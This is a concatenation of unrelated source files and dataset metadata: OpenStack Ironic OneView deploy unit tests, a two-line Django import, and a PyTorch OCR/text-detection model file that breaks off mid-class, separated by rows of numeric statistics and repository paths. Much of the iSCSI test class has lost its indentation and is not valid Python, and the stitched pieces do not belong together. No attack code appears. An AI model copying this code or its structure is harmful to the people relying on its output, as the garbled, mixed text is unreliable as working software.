        mock_get_ov_client.return_value = oneview_client
        check_deploy_mock.return_value = None
        self.node.provision_state = states.DEPLOYWAIT
        self.node.target_provision_state = states.ACTIVE
        driver_info = self.node.driver_info
        driver_info['applied_server_profile_uri'] = 'any/applied_sp_uri/'
        self.node.driver_info = driver_info
        self.node.save()
        with task_manager.acquire(self.context, self.node.uuid,
                                  shared=False) as task:
            get_power_state_mock.return_value = states.POWER_OFF
            task.node.driver_internal_info['is_whole_disk_image'] = True
            task.driver.boot = None
            task.driver.deploy.reboot_to_instance(task)
            self.assertFalse(clean_pxe_mock.called)
            check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
            power_off_mock.assert_called_once_with(task.node)
            get_power_state_mock.assert_called_once_with(task)
            node_power_action_mock.assert_called_once_with(
                task, states.POWER_ON)
            self.assertEqual(states.ACTIVE, task.node.provision_state)
            self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class OneViewIscsiDeployTestCase(db_base.DbTestCase):
def setUp(self):
super(OneViewIscsiDeployTestCase, self).setUp()
self.config(manager_url='https://1.2.3.4', group='oneview')
self.config(username='user', group='oneview')
self.config(password='password', group='oneview')
mgr_utils.mock_the_extension_manager(driver='iscsi_pxe_oneview')
self.driver = driver_factory.get_driver('iscsi_pxe_oneview')
OV_DRV_INFO_DICT = db_utils.get_test_oneview_driver_info()
OV_DRV_INFO_DICT.update(PXE_DRV_INFO_DICT)
self.node = obj_utils.create_test_node(
self.context, driver='iscsi_pxe_oneview',
properties=db_utils.get_test_oneview_properties(),
driver_info=OV_DRV_INFO_DICT,
instance_info=PXE_INST_INFO_DICT,
)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
self.info = common.get_oneview_info(self.node)
def test_get_properties(self, mock_get_ov_client):
expected = common.COMMON_PROPERTIES
self.assertEqual(expected, self.driver.deploy.get_properties())
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'validate',
spec_set=True, autospec=True)
def test_validate(self, iscsi_deploy_validate_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.validate(task)
iscsi_deploy_validate_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare(self, iscsi_deploy_prepare_mock, mock_get_ov_client):
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
def test_prepare_active_node(self, iscsi_deploy_prepare_mock,
mock_get_ov_client):
"""Ensure nodes in running states are not inadvertently changed"""
test_states = list(states.STABLE_STATES)
test_states.extend([states.CLEANING,
states.CLEANWAIT,
states.INSPECTING])
for state in test_states:
self.node.provision_state = state
self.node.save()
iscsi_deploy_prepare_mock.reset_mock()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(
mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
iscsi_deploy_prepare_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.provision_state = states.DEPLOYING
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.prepare(task)
iscsi_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'deploy',
spec_set=True, autospec=True)
def test_deploy(self, iscsi_deploy_mock, mock_get_ov_client):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.deploy(task)
iscsi_deploy_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down', spec_set=True,
autospec=True)
def test_tear_down(self, iscsi_tear_down_mock, mock_get_ov_client):
iscsi_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
iscsi_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down', spec_set=True,
autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
iscsi_tear_down_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
CONF.conductor.automated_clean = False
iscsi_tear_down_mock.return_value = states.DELETED
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
returned_state = task.driver.deploy.tear_down(task)
iscsi_tear_down_mock.assert_called_once_with(mock.ANY, task)
self.assertEqual(states.DELETED, returned_state)
self.assertTrue(deallocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
def test_prepare_cleaning(self, iscsi_prep_clean_mock, mock_get_ov_client):
iscsi_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
iscsi_prep_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'prepare_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
def test_prepare_cleaning_with_dynamic_allocation_enabled(
self, allocate_server_hardware_mock,
iscsi_prep_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
iscsi_prep_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
ret = task.driver.deploy.prepare_cleaning(task)
self.assertEqual(states.CLEANWAIT, ret)
iscsi_prep_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(allocate_server_hardware_mock.called)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
def test_tear_down_cleaning(self, iscsi_tear_down_clean_mock,
mock_get_ov_client):
iscsi_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
iscsi_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
@mock.patch.object(iscsi_deploy.ISCSIDeploy, 'tear_down_cleaning',
spec_set=True, autospec=True)
@mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
def test_tear_down_cleaning_with_dynamic_allocation_enabled(
self, deallocate_server_hardware_mock,
iscsi_tear_down_clean_mock, mock_get_ov_client
):
driver_info = self.node.driver_info
driver_info['dynamic_allocation'] = True
self.node.driver_info = driver_info
self.node.save()
iscsi_tear_down_clean_mock.return_value = states.CLEANWAIT
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.deploy.tear_down_cleaning(task)
iscsi_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
self.assertTrue(deallocate_server_hardware_mock.called)
@mock.patch.object(common, 'get_oneview_client', spec_set=True, autospec=True)
class OneViewAgentDeployTestCase(db_base.DbTestCase):
    """Exercise the OneView agent deploy interface.

    Each test verifies that the OneView wrapper delegates to the stock
    ``agent.AgentDeploy`` implementation and, where dynamic allocation is
    enabled, additionally (de)allocates OneView server hardware.
    """

    def setUp(self):
        super(OneViewAgentDeployTestCase, self).setUp()
        self.config(manager_url='https://1.2.3.4', group='oneview')
        self.config(username='user', group='oneview')
        self.config(password='password', group='oneview')
        mgr_utils.mock_the_extension_manager(driver='agent_pxe_oneview')
        self.driver = driver_factory.get_driver('agent_pxe_oneview')
        driver_info = db_utils.get_test_oneview_driver_info()
        driver_info.update(PXE_DRV_INFO_DICT)
        self.node = obj_utils.create_test_node(
            self.context, driver='agent_pxe_oneview',
            properties=db_utils.get_test_oneview_properties(),
            driver_info=driver_info,
            instance_info=PXE_INST_INFO_DICT,
        )
        self.port = obj_utils.create_test_port(self.context,
                                               node_id=self.node.id)
        self.info = common.get_oneview_info(self.node)

    def _enable_dynamic_allocation(self):
        """Flag the test node's driver_info for dynamic allocation."""
        info = self.node.driver_info
        info['dynamic_allocation'] = True
        self.node.driver_info = info

    def test_get_properties(self, mock_get_ov_client):
        """The deploy interface exposes the common OneView properties."""
        self.assertEqual(common.COMMON_PROPERTIES,
                         self.driver.deploy.get_properties())

    @mock.patch.object(agent.AgentDeploy, 'validate',
                       spec_set=True, autospec=True)
    def test_validate(self, agent_deploy_validate_mock, mock_get_ov_client):
        """validate delegates to the wrapped agent implementation."""
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.validate(task)
            agent_deploy_validate_mock.assert_called_once_with(mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'prepare',
                       spec_set=True, autospec=True)
    def test_prepare(self, agent_deploy_prepare_mock, mock_get_ov_client):
        """prepare delegates to the wrapped agent implementation."""
        self.node.provision_state = states.DEPLOYING
        self.node.save()
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.prepare(task)
            agent_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'prepare',
                       spec_set=True, autospec=True)
    def test_prepare_active_node(self, agent_deploy_prepare_mock,
                                 mock_get_ov_client):
        """Ensure nodes in running states are not inadvertently changed."""
        test_states = list(states.STABLE_STATES)
        test_states.extend([states.CLEANING, states.CLEANWAIT,
                            states.INSPECTING])
        for state in test_states:
            self.node.provision_state = state
            self.node.save()
            agent_deploy_prepare_mock.reset_mock()
            with task_manager.acquire(
                    self.context, self.node.uuid, shared=False) as task:
                task.driver.deploy.prepare(task)
                agent_deploy_prepare_mock.assert_called_once_with(
                    mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'prepare',
                       spec_set=True, autospec=True)
    @mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
    def test_prepare_with_dynamic_allocation_enabled(
        self, allocate_server_hardware_mock,
        agent_deploy_prepare_mock, mock_get_ov_client
    ):
        """With dynamic allocation, prepare also claims server hardware."""
        self._enable_dynamic_allocation()
        self.node.provision_state = states.DEPLOYING
        self.node.save()
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.prepare(task)
            agent_deploy_prepare_mock.assert_called_once_with(mock.ANY, task)
            self.assertTrue(allocate_server_hardware_mock.called)

    @mock.patch.object(agent.AgentDeploy, 'deploy',
                       spec_set=True, autospec=True)
    def test_deploy(self, agent_deploy_mock, mock_get_ov_client):
        """deploy delegates to the wrapped agent implementation."""
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.deploy(task)
            agent_deploy_mock.assert_called_once_with(mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'tear_down', spec_set=True,
                       autospec=True)
    def test_tear_down(self, agent_tear_down_mock, mock_get_ov_client):
        """tear_down delegates to the agent and forwards its state."""
        agent_tear_down_mock.return_value = states.DELETED
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            final_state = task.driver.deploy.tear_down(task)
            agent_tear_down_mock.assert_called_once_with(mock.ANY, task)
            self.assertEqual(states.DELETED, final_state)

    @mock.patch.object(agent.AgentDeploy, 'tear_down', spec_set=True,
                       autospec=True)
    @mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
    def test_tear_down_with_dynamic_allocation_enabled(
        self, deallocate_server_hardware_mock,
        agent_tear_down_mock, mock_get_ov_client
    ):
        """With dynamic allocation, tear down also frees server hardware."""
        self._enable_dynamic_allocation()
        self.node.save()
        # Disable automated cleaning so deallocation runs during tear down.
        CONF.conductor.automated_clean = False
        agent_tear_down_mock.return_value = states.DELETED
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            final_state = task.driver.deploy.tear_down(task)
            agent_tear_down_mock.assert_called_once_with(mock.ANY, task)
            self.assertEqual(states.DELETED, final_state)
            self.assertTrue(deallocate_server_hardware_mock.called)

    @mock.patch.object(agent.AgentDeploy, 'prepare_cleaning',
                       spec_set=True, autospec=True)
    def test_prepare_cleaning(self, agent_prep_clean_mock, mock_get_ov_client):
        """prepare_cleaning delegates to the agent and returns CLEANWAIT."""
        agent_prep_clean_mock.return_value = states.CLEANWAIT
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            result = task.driver.deploy.prepare_cleaning(task)
            self.assertEqual(states.CLEANWAIT, result)
            agent_prep_clean_mock.assert_called_once_with(mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'prepare_cleaning',
                       spec_set=True, autospec=True)
    @mock.patch.object(deploy_utils, 'allocate_server_hardware_to_ironic')
    def test_prepare_cleaning_with_dynamic_allocation_enabled(
        self, allocate_server_hardware_mock,
        agent_prep_clean_mock, mock_get_ov_client
    ):
        """With dynamic allocation, cleaning first claims server hardware."""
        self._enable_dynamic_allocation()
        self.node.save()
        agent_prep_clean_mock.return_value = states.CLEANWAIT
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            result = task.driver.deploy.prepare_cleaning(task)
            self.assertEqual(states.CLEANWAIT, result)
            agent_prep_clean_mock.assert_called_once_with(mock.ANY, task)
            self.assertTrue(allocate_server_hardware_mock.called)

    @mock.patch.object(agent.AgentDeploy, 'tear_down_cleaning',
                       spec_set=True, autospec=True)
    def test_tear_down_cleaning(self, agent_tear_down_clean_mock,
                                mock_get_ov_client):
        """tear_down_cleaning delegates to the wrapped agent implementation."""
        agent_tear_down_clean_mock.return_value = states.CLEANWAIT
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.tear_down_cleaning(task)
            agent_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)

    @mock.patch.object(agent.AgentDeploy, 'tear_down_cleaning',
                       spec_set=True, autospec=True)
    @mock.patch.object(deploy_utils, 'deallocate_server_hardware_from_ironic')
    def test_tear_down_cleaning_with_dynamic_allocation_enabled(
        self, deallocate_server_hardware_mock,
        agent_tear_down_clean_mock, mock_get_ov_client
    ):
        """With dynamic allocation, cleaning teardown frees server hardware."""
        self._enable_dynamic_allocation()
        self.node.save()
        agent_tear_down_clean_mock.return_value = states.CLEANWAIT
        with task_manager.acquire(
                self.context, self.node.uuid, shared=False) as task:
            task.driver.deploy.tear_down_cleaning(task)
            agent_tear_down_clean_mock.assert_called_once_with(mock.ANY, task)
            self.assertTrue(deallocate_server_hardware_mock.called)
| 47.501618
| 79
| 0.683563
| 5,430
| 44,034
| 5.160037
| 0.052118
| 0.040829
| 0.032656
| 0.032121
| 0.918413
| 0.907099
| 0.88697
| 0.864342
| 0.848139
| 0.841893
| 0
| 0.001221
| 0.237271
| 44,034
| 926
| 80
| 47.552916
| 0.833026
| 0.018281
| 0
| 0.778195
| 0
| 0
| 0.051037
| 0.015068
| 0
| 0
| 0
| 0
| 0.151629
| 1
| 0.06015
| false
| 0.003759
| 0.030075
| 0
| 0.097744
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dba8d17b113a045f52f47aebeeb44caccf3102dd
| 81
|
py
|
Python
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 4
|
2019-12-06T06:19:33.000Z
|
2021-12-23T13:05:06.000Z
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | 8
|
2020-03-15T03:40:38.000Z
|
2022-03-12T00:50:27.000Z
|
devops-console/apps/pipelines/views.py
|
lilinghell/devops
|
1b2890d3f2d9f6e15e5b32d0910bc4768f065adc
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import viewsets
from rest_framework.response import Response
| 27
| 44
| 0.888889
| 11
| 81
| 6.363636
| 0.545455
| 0.228571
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 45
| 40.5
| 0.958904
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dbd0b75cc3fa040909911a05eaa10e5db16e1d9f
| 26,653
|
py
|
Python
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 284
|
2018-10-17T12:13:54.000Z
|
2022-03-31T07:36:31.000Z
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 72
|
2018-10-29T08:45:47.000Z
|
2021-12-16T15:15:24.000Z
|
models.py
|
dipikakhullar/ocr
|
a55e70d82f42803be5ed63f8f59e4fa597fcf8d6
|
[
"MIT"
] | 86
|
2018-10-26T14:11:08.000Z
|
2022-03-26T13:44:10.000Z
|
'''
Created on Sep 3, 2017
@author: Michal.Busta at gmail.com
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.nn import LeakyReLU, Conv2d, Dropout2d, LogSoftmax, InstanceNorm2d
import math
class CReLU(nn.Module):
    """Concatenated ReLU: stacks LeakyReLU(x) and LeakyReLU(-x) on dim 1.

    Doubles the channel count so both signs of the pre-activation survive.
    """

    def __init__(self):
        super(CReLU, self).__init__()

    def forward(self, x):
        # BUG FIX: the original used ``inplace=True`` on the first
        # ``F.leaky_relu`` call, which overwrote ``x`` (the caller's
        # tensor) with LeakyReLU(x) before ``-x`` was evaluated.  The
        # second branch therefore computed leaky_relu(-leaky_relu(x))
        # instead of leaky_relu(-x) — off by a factor of 100 for
        # negative inputs.  Out-of-place calls restore the intended
        # CReLU semantics and leave the input untouched.
        return torch.cat((F.leaky_relu(x, 0.01), F.leaky_relu(-x, 0.01)), 1)
class CReLU_IN(nn.Module):
    """Concatenated ReLU followed by instance normalization.

    Output has ``channels * 2`` channels: [x, -x] normalized, then
    passed through a LeakyReLU.
    """

    def __init__(self, channels):
        super(CReLU_IN, self).__init__()
        # The concatenation doubles the channel count before the norm.
        self.bn = nn.InstanceNorm2d(channels * 2, eps=1e-05, momentum=0.1,
                                    affine=True)

    def forward(self, x):
        stacked = torch.cat((x, -x), 1)
        return F.leaky_relu(self.bn(stacked), 0.01, inplace=True)
def conv_bn(inp, oup, stride):
    """Build a 3x3 conv (no bias) -> BatchNorm -> ReLU block."""
    layers = [
        nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
        nn.BatchNorm2d(oup),
        nn.ReLU(inplace=True),
    ]
    return nn.Sequential(*layers)
def conv_dw(inp, oup, stride, dilation=1):
    """Depthwise-separable conv: depthwise 3x3 then pointwise 1x1.

    Both convs are followed by BatchNorm + LeakyReLU.  For dilation > 1
    the depthwise padding grows to ``dilation`` so spatial size is kept
    (modulo stride).
    """
    padding = 1 + (dilation > 0) * (dilation - 1)
    return nn.Sequential(
        nn.Conv2d(inp, inp, 3, stride, padding, dilation=dilation,
                  groups=inp, bias=False),
        nn.BatchNorm2d(inp),
        nn.LeakyReLU(inplace=True, negative_slope=0.01),
        nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
        nn.BatchNorm2d(oup),
        nn.LeakyReLU(inplace=True, negative_slope=0.01),
    )
def conv_dw_plain(inp, oup, stride, dilation=1):
    """Depthwise 3x3 + pointwise 1x1 with no norm or activation."""
    depthwise = nn.Conv2d(inp, inp, 3, stride,
                          1 + (dilation > 0) * (dilation - 1),
                          dilation=dilation, groups=inp, bias=False)
    pointwise = nn.Conv2d(inp, oup, 1, 1, 0, bias=False)
    return nn.Sequential(depthwise, pointwise)
def conv_dw_res(inp, oup, stride):
    """Depthwise-separable block ending in BatchNorm, no final activation.

    Intended for residual branches where the activation is applied after
    the skip connection is added.
    """
    layers = [
        nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
        nn.BatchNorm2d(inp),
        nn.LeakyReLU(inplace=True, negative_slope=0.01),
        nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
        nn.BatchNorm2d(oup),
    ]
    return nn.Sequential(*layers)
def conv_dw_in(inp, oup, stride, dilation=1):
    """Depthwise-separable block normalized with InstanceNorm2d."""
    pad = 1 + (dilation > 0) * (dilation - 1)
    layers = [
        nn.Conv2d(inp, inp, 3, stride, pad, dilation=dilation, groups=inp,
                  bias=False),
        nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
        InstanceNorm2d(oup, eps=1e-05, momentum=0.1),
        nn.LeakyReLU(inplace=True, negative_slope=0.01),
    ]
    return nn.Sequential(*layers)
def conv_dw_res_in(inp, oup, stride):
    """Depthwise-separable residual branch normalized with InstanceNorm2d.

    Ends in a norm (no activation) so the caller can add the skip
    connection before activating.
    """
    layers = [
        nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
        nn.InstanceNorm2d(inp, eps=1e-05, momentum=0.1, affine=True),
        nn.LeakyReLU(inplace=True, negative_slope=0.01),
        nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
        nn.InstanceNorm2d(oup, eps=1e-05, momentum=0.1, affine=True),
    ]
    return nn.Sequential(*layers)
def dice_loss(inp, target):
    """Negated smoothed Dice coefficient between two tensors.

    Both tensors are flattened; the result lies in [-1, 0], so
    minimizing it maximizes overlap between ``inp`` and ``target``.
    """
    smooth = 1.
    pred_flat = inp.view(-1)
    gt_flat = target.view(-1)
    overlap = (pred_flat * gt_flat).sum()
    denom = pred_flat.sum() + gt_flat.sum() + smooth
    return -((2. * overlap + smooth) / denom)
class BasicBlockSep(nn.Module):
    """Residual block built from depthwise-separable convolutions.

    Uses the module-level ``conv_dw`` / ``conv_dw_res`` helpers; the
    LeakyReLU is applied after the skip connection is added.
    """

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None,
                 dilation=1):
        super(BasicBlockSep, self).__init__()
        self.conv_sep1 = conv_dw(inplanes, planes, stride, dilation=dilation)
        self.conv2 = conv_dw_res(planes, planes, 1)
        self.downsample = downsample
        self.stride = stride
        self.relu = LeakyReLU(negative_slope=0.01, inplace=True)

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.conv2(self.conv_sep1(x))
        out += shortcut
        return self.relu(out)
class BasicBlockIn(nn.Module):
    """Standard 3x3 residual block using InstanceNorm instead of BatchNorm."""

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlockIn, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn1 = InstanceNorm2d(planes, eps=1e-05, momentum=0.1, affine=True)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1,
                               padding=1, bias=False)
        self.bn2 = InstanceNorm2d(planes, eps=1e-05, momentum=0.1, affine=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        # Resolve the skip branch first; the main branch is
        # conv -> norm -> relu -> conv -> norm, activated after the add.
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out += shortcut
        return self.relu(out)
class BasicBlockSepIn(nn.Module):
    """Depthwise-separable residual block with InstanceNorm.

    Same shape as ``BasicBlockSep`` but built from the instance-norm
    helpers ``conv_dw_in`` / ``conv_dw_res_in``.
    """

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None,
                 dilation=1):
        super(BasicBlockSepIn, self).__init__()
        self.conv_sep1 = conv_dw_in(inplanes, planes, stride,
                                    dilation=dilation)
        self.conv2 = conv_dw_res_in(planes, planes, 1)
        self.downsample = downsample
        self.stride = stride
        self.relu = LeakyReLU(negative_slope=0.01, inplace=True)

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.conv2(self.conv_sep1(x))
        out += shortcut
        return self.relu(out)
def iou_loss(roi_gt, byte_mask, roi_pred, box_loss_value):
    """Accumulate a log-IoU box regression loss into ``box_loss_value``.

    :param roi_gt: ground-truth box distances, shape (N, H, W, 4) — indexed
        as [:, :, :, k].  d1/d2 appear to be paired opposite distances and
        d3/d4 one-sided extents — TODO confirm exact geometry against caller.
    :param byte_mask: boolean mask of positive (text) pixels, shape (N, H, W).
    :param roi_pred: predicted distances, shape (N, 4, H, W) — channel-first,
        indexed as [:, k, :, :].
    :param box_loss_value: scalar tensor accumulated into IN PLACE via
        ``+=``; this function returns None, so the caller must pass a
        non-leaf tensor for gradients to flow.
    """
    d1_gt = roi_gt[:, :, :, 0][byte_mask]
    d2_gt = roi_gt[:, :, :, 1][byte_mask]
    d3_gt = roi_gt[:, :, :, 2][byte_mask]
    d4_gt = roi_gt[:, :, :, 3][byte_mask]
    # Only pixels with a positive d3 (resp. d4) extent contribute to the
    # corresponding term; mask3/mask4 index into the already-masked vectors.
    mask3 = torch.gt(d3_gt, 0)
    mask4 = torch.gt(d4_gt, 0)
    d3_gt = d3_gt[mask3]
    d4_gt = d4_gt[mask4]
    d1_pred = roi_pred[:, 0, :, :][byte_mask]
    d2_pred = roi_pred[:, 1, :, :][byte_mask]
    d3_pred = roi_pred[:, 2, :, :][byte_mask]
    d3_pred = d3_pred[mask3]
    d4_pred = roi_pred[:, 3, :, :][byte_mask]
    d4_pred = d4_pred[mask4]
    # "Left" term: IoU of the (d1+d2) x d3 rectangles, per pixel.
    area_gt_l = (d1_gt[mask3] + d2_gt[mask3]) * (d3_gt)
    area_pred_l = (d1_pred[mask3] + d2_pred[mask3]) * (d3_pred)
    w_union_l = torch.min(d3_gt, d3_pred)
    h_union_l = torch.min(d1_gt[mask3], d1_pred[mask3]) + torch.min(d2_gt[mask3], d2_pred[mask3])
    area_intersect_l = w_union_l * h_union_l
    area_union_l = area_gt_l + area_pred_l - area_intersect_l
    # +1.0 smoothing keeps the log finite for empty intersections.
    AABB_l = - torch.log((area_intersect_l + 1.0)/(area_union_l + 1.0))
    # dim() > 0 guards against an empty selection producing a 0-d mean.
    if AABB_l.dim() > 0:
        box_loss_value += torch.mean(AABB_l)
    # "Right" term: same IoU construction using the d4 extent.
    area_gt_r = (d1_gt[mask4] + d2_gt[mask4]) * (d4_gt)
    area_pred_r = (d1_pred[mask4] + d2_pred[mask4]) * (d4_pred)
    w_union_r = torch.min(d4_gt, d4_pred)
    h_union_r = torch.min(d1_gt[mask4], d1_pred[mask4]) + torch.min(d2_gt[mask4], d2_pred[mask4])
    area_intersect_r = w_union_r * h_union_r
    area_union_r = area_gt_r + area_pred_r - area_intersect_r
    AABB_r = - torch.log((area_intersect_r + 1.0)/(area_union_r + 1.0))
    if AABB_r.dim() > 0:
        box_loss_value += torch.mean(AABB_r)
class ModelResNetSep2(nn.Module):
    """Text detection + OCR network with a separable-ResNet backbone.

    ``forward`` returns multi-scale segmentation, rotated-box and angle
    predictions (an EAST-style detector head over an FPN-like decoder);
    ``forward_ocr`` runs a separate recognition head producing per-column
    log-probabilities over an 8400-class alphabet.
    """

    def recompute(self):
        # NOTE(review): plain nn.Conv2d has no ``recompute_weights``;
        # presumably the stem convs are swapped for a custom conv class
        # elsewhere before this is called — confirm before relying on it.
        self.layer0[0].recompute_weights()
        self.layer0[2].recompute_weights()
        self.layer0_1[0].recompute_weights()
        self.layer0_1[2].recompute_weights()

    def __init__(self, attention = False, multi_scale = True):
        """:param attention: enable per-level attention gating in the decoder.
        :param multi_scale: add the half-resolution head to the loss."""
        super(ModelResNetSep2, self).__init__()
        self.inplanes = 64
        # Stem: two stride-2 stages; CReLU_IN doubles channels (16->32, 32->64).
        self.layer0 = nn.Sequential(
            Conv2d(3, 16, 3, stride=1, padding=1, bias=False),
            CReLU_IN(16),
            Conv2d(32, 32, 3, stride=2, padding=1, bias=False),
            CReLU_IN(32)
        )
        self.layer0_1 = nn.Sequential(
            Conv2d(64, 64, 3, stride=1, padding=1, bias=False),
            #nn.InstanceNorm2d(64, affine=True),
            nn.ReLU(),
            Conv2d(64, 64, 3, stride=2, padding=1, bias=False),
            #nn.InstanceNorm2d(64, affine=True),
            nn.ReLU(inplace=True)
        )
        # OCR head convs (used by forward_ocr, not by forward).
        self.conv5 = Conv2d(64, 128, (3,3), padding=(1, 1), bias=False)
        self.conv6 = Conv2d(128, 128, (3,3), padding=1, bias=False)
        self.conv7 = Conv2d(128,256, 3, padding=1, bias=False)
